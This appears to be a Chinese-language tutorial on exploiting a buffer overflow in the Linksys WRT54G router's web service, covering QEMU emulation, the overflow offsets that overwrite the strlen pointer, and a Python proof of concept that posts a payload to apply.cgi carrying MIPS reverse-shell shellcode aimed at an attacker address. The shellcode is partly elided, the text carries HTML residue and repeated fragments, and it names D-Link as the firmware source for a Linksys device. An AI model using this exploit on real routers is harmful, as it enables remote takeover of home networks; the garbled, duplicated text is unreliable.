Linksys WRT54G路由器溢出漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2>
本文详细分析Linksys WRT54G路由器中的缓冲区溢出漏洞，该漏洞存在于HTTPD服务的`do_apply_post<\/code>函数中，由于未对POST参数长度进行校验，导致攻击者可以通过构造恶意请求实现远程代码执行。<\/p>`

2. 环境准备<\/h2>
2.1 所需工具<\/h3>

固件文件<\/strong>: 可从D-Link官方<\/a>下载<\/li>
nvram-faker<\/strong>: 模拟NVRAM的库，GitHub地址<\/a><\/li>
QEMU<\/strong>: 用于模拟MIPS架构环境<\/li>
<\/ul>
2.2 网络配置<\/h3>

攻击机IP: 192.168.40.146<\/li>
路由器IP: 192.168.40.200<\/li>
<\/ul>
2.3 QEMU启动命令<\/h3>
sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta \
<\/span><\/span><\/span><\/span>-hda debian_wheezy_mipsel_standard.qcow2 \
<\/span><\/span><\/span><\/span>-append "root=\/dev\/sda1 console=tty0"<\/span> -net nic -net tap -nographic
<\/span><\/span><\/code><\/pre>2.4 文件传输<\/h3>
将路由器文件系统传输到仿真环境:<\/p>
sudo scp -r .\/squashfs-root\/ root@192.168.40.200:\/root\/
<\/span><\/span><\/code><\/pre>3. HTTPD服务启动方法<\/h2>
方法一: 常规启动(失败)<\/h3>
尝试常规启动httpd服务，但只启动了FTP服务。<\/p>
方法二: 未详细说明<\/h3>
方法三: 强制启动(成功)<\/h3>
使用QEMU用户模式启动httpd:<\/p>
sudo chroot .\/ .\/qemu-mipsel-static .\/usr\/sbin\/httpd
<\/span><\/span><\/code><\/pre>解释<\/strong>:<\/p>

qemu-mipsel-static<\/code>是预编译的QEMU用户模式模拟器<\/li>
它包含了必要的动态链接库，可以解决依赖问题<\/li>
使用chroot限制文件系统访问范围<\/li>
<\/ul>
4. 漏洞分析<\/h2>
4.1 漏洞代码<\/h3>
伪代码分析:<\/p>
wreadlen =<\/span> wfread(post_buf, 1<\/span>, content-<\/span>length, fhandle);
<\/span><\/span>if<\/span>(wreadlen) 
<\/span><\/span>    strlen(post_buf);
<\/span><\/span><\/code><\/pre>问题点<\/strong>:<\/p>

直接使用content-length<\/code>作为读取长度，没有校验<\/li>
post_buf<\/code>大小固定为0x2710(10,000)字节<\/li>
读取后直接调用strlen<\/code>，没有缓冲区边界检查<\/li>
<\/ol>
4.2 内存布局<\/h3>

post_buf<\/code>位于HTTPD的.data<\/code>段<\/li>
.data<\/code>段用于存放已初始化的全局变量<\/li>
后续内存段(.extern等)连续且可写<\/li>
<\/ul>
4.3 溢出利用思路<\/h3>

溢出覆盖.data<\/code>段后面的多个段<\/li>
最终覆盖.extern<\/code>段中的strlen<\/code>函数地址<\/li>
当调用strlen<\/code>时，执行流程被劫持<\/li>
需要填充0x2F32(0x1000D7A0 - 0x10001AD8)字节数据<\/li>
<\/ol>
5. 漏洞利用<\/h2>
5.1 利用策略<\/h3>

在post_buf<\/code>中布置Shellcode和NOP雪橇<\/li>
填充0x4000字节数据，全部覆盖为post_buf<\/code>首地址<\/li>
确保覆盖strlen<\/code>函数地址<\/li>
strlen<\/code>被劫持到Shellcode起始位置<\/li>
<\/ol>
5.2 Shellcode构造<\/h3>
使用MIPS架构的反弹Shell代码，关键部分:<\/p>
mipselshell =<\/span> "<\/span>\xfa\xff\x0f\x24<\/span>"<\/span>  # li t7,-6<\/span>
<\/span><\/span>mipselshell +=<\/span> "<\/span>\x27\x78\xe0\x01<\/span>"<\/span> # nor t7,t7,zero<\/span>
<\/span><\/span># ... 更多指令 ...<\/span>
<\/span><\/span><\/code><\/pre>5.3 完整POC代码<\/h3>
import<\/span> sys
<\/span><\/span>import<\/span> struct,<\/span>socket
<\/span><\/span>import<\/span> urllib2
<\/span><\/span>
<\/span><\/span>def<\/span> makepayload<\/span>(host,port):
<\/span><\/span>    # Shellcode构造部分<\/span>
<\/span><\/span>    hosts =<\/span> struct.<\/span>unpack('<cccc'<\/span>,struct.<\/span>pack('<L'<\/span>,host))
<\/span><\/span>    ports =<\/span> struct.<\/span>unpack('<cccc'<\/span>,struct.<\/span>pack('<L'<\/span>,port))
<\/span><\/span>    mipselshell =<\/span> "<\/span>\xfa\xff\x0f\x24<\/span>"<\/span>  # li t7,-6<\/span>
<\/span><\/span>    # ... 完整Shellcode ...<\/span>
<\/span><\/span>    return<\/span> mipselshell
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    target =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>except<\/span>:
<\/span><\/span>    print "Usage: <\/span>%s<\/span> <target>"<\/span> %<\/span> sys.<\/span>argv[0<\/span>]
<\/span><\/span>    sys.<\/span>exit(1<\/span>)
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/<\/span>%s<\/span>\/apply.cgi"<\/span> %<\/span> target
<\/span><\/span>sip =<\/span> '192.168.1.100'<\/span>  # 攻击机IP<\/span>
<\/span><\/span>sport =<\/span> 1234<\/span>           # 攻击机端口<\/span>
<\/span><\/span>
<\/span><\/span>host =<\/span> socket.<\/span>ntohl(struct.<\/span>unpack('<I'<\/span>,socket.<\/span>inet_aton(sip))[0<\/span>])
<\/span><\/span>payload =<\/span> makepayload(host,sport)
<\/span><\/span>addr =<\/span> struct.<\/span>pack("<L"<\/span>,0x10001AD8<\/span>)  # post_buf地址<\/span>
<\/span><\/span>DataSegSize =<\/span> 0x4000<\/span>
<\/span><\/span>buf =<\/span> "<\/span>\x00<\/span>"<\/span>*<\/span>(10000<\/span>-<\/span>len(payload)) +<\/span> payload +<\/span> addr*<\/span>(DataSegSize\/<\/span>4<\/span>)
<\/span><\/span>
<\/span><\/span>req =<\/span> urllib2.<\/span>Request(url, buf)
<\/span><\/span>print urllib2.<\/span>urlopen(req).<\/span>read()
<\/span><\/span><\/code><\/pre>6. 关键点总结<\/h2>

漏洞成因<\/strong>: 未校验的content-length<\/code>导致缓冲区溢出<\/li>
利用条件<\/strong>:

后续内存段连续可写<\/li>
存在关键函数指针(strlen<\/code>)可覆盖<\/li>
<\/ul>
<\/li>
利用技巧<\/strong>:

精确计算偏移量(0x2F32字节)<\/li>
使用地址淹没技术提高成功率<\/li>
MIPS架构Shellcode构造<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>

对所有输入进行长度校验<\/li>
使用非可执行内存(NX)保护<\/li>
实现地址随机化(ASLR)<\/li>
对关键函数指针进行保护<\/li>
<\/ol>
8. 参考资源<\/h2>

原始固件下载地址<\/li>
nvram-faker项目<\/li>
QEMU模拟器文档<\/li>
MIPS架构手册<\/li>
<\/ol>

Linksys WRT54G路由器溢出漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2> 本文详细分析Linksys WRT54G路由器中的缓冲区溢出漏洞，该漏洞存在于HTTPD服务的do_apply_post<\/code>函数中，由于未对POST参数长度进行校验，导致攻击者可以通过构造恶意请求实现远程代码执行。<\/p>

3. HTTPD服务启动方法<\/h2>

方法一: 常规启动(失败)<\/h3> 尝试常规启动httpd服务，但只启动了FTP服务。<\/p>

方法二: 未详细说明<\/h3>

4. 漏洞分析<\/h2>

5. 漏洞利用<\/h2>

8. 参考资源<\/h2> 原始固件下载地址<\/li> nvram-faker项目<\/li> QEMU模拟器文档<\/li> MIPS架构手册<\/li> <\/ol>

1. 漏洞概述<\/h2>
本文详细分析Linksys WRT54G路由器中的缓冲区溢出漏洞，该漏洞存在于HTTPD服务的`do_apply_post<\/code>函数中，由于未对POST参数长度进行校验，导致攻击者可以通过构造恶意请求实现远程代码执行。<\/p>`

方法一: 常规启动(失败)<\/h3>
尝试常规启动httpd服务，但只启动了FTP服务。<\/p>

8. 参考资源<\/h2>

原始固件下载地址<\/li>
nvram-faker项目<\/li>
QEMU模拟器文档<\/li>
MIPS架构手册<\/li> <\/ol>